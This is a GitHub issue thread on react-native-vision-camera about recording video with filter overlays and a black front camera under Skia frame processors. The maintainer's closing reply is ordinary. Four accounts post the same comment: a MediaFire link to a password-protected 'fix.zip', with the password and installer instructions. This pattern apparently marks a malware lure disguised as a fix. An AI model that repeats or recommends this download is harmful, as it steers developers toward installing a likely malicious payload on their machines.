### ISSUE TITLE
💭 Do you have any reference code for recording videos with overlays similar to Snapchat filters? When using the Skia frame processor, the front camera is displaying a black screen.

### ISSUE THREAD

**Issue by shishi-RN** [cuvent/react-native-vision-camera#3154]
### Question

💭 Do you have any reference code for recording videos with overlays similar to Snapchat filters? When using the Skia frame processor, the front camera is displaying a black screen.

### What I tried

💭 Do you have any reference code for recording videos with overlays similar to Snapchat filters? When using the Skia frame processor, the front camera is displaying a black screen.

### VisionCamera Version

^4.5.1

### Additional information

- [ ] I am using Expo
- [X] I have read the [Troubleshooting Guide](https://react-native-vision-camera.com/docs/guides/troubleshooting)
- [X] I agree to follow this project's [Code of Conduct](https://github.com/mrousavy/react-native-vision-camera/blob/main/CODE_OF_CONDUCT.md)
- [X] I searched for similar questions [in the issues page](https://github.com/mrousavy/react-native-vision-camera/issues?q=is%3Aopen+is%3Aissue+label%3A%22💭+question%22) as well as [in the discussions page](https://github.com/mrousavy/react-native-vision-camera/discussions) and found none.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrousavy** [comment]
There's a bunch of example repos out there I created for this. Skia Frame Processors is preview only though, see https://react-native-vision-camera.com/docs/guides/skia-frame-processors
